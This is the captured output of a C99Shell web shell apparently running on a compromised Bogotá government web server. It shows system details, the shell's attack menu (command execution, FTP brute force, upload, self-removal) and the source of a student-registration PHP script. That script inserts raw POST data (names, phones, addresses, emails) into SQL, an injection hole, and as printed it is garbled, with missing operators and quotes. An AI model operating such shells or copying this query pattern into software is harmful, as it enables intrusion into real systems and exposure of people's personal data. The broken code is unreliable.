!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     recibeEstudiantes.php (1.1 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once('conexionEstudiantes/conexion.php'); 

$fecha $_POST['fecha'];
$nombreE $_POST['nombreE'];
$telefono $_POST['telefono'];
$celular $_POST['celular'];
$correo $_POST['correo'];
$direccion $_POST['direccion'];
$localidad $_POST['localidad'];
$educativa $_POST['educativa'];
$experiencia $_POST['experiencia'];
$cualexperiencia $_POST['cualexperiencia'];
$tema $_POST['tema'];
$accion $_POST['accion'];
$imagen $_POST['imagen'];

$sql4 "INSERT INTO estudiantes(
`id`,
`fecha` ,
`nombreE` ,
`telefono` ,
`celular` ,
`correo` ,
`direccion` ,
`localidad` ,
`educativa` ,
`experiencia` ,
`cualexperiencia` ,
`tema` ,
`accion` ,
`imagen`
)

VALUES (
NULL , '
$fecha', '$nombreE', '$telefono, '$celular', '$correo', '$direccion', '$localidad', '$educativa', '$experiencia', '$cualexperiencia', '$tema', '$accion', '$imagen'
)"
;

$resultado=mysql_query($sql4) or die(mysql_error());
// Para probar si hay algun error
//$resultado=mysql_query($sql3) or die(mysql_error());

echo "Gracias por su opinión. Espere muy pronto los resultados";


?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--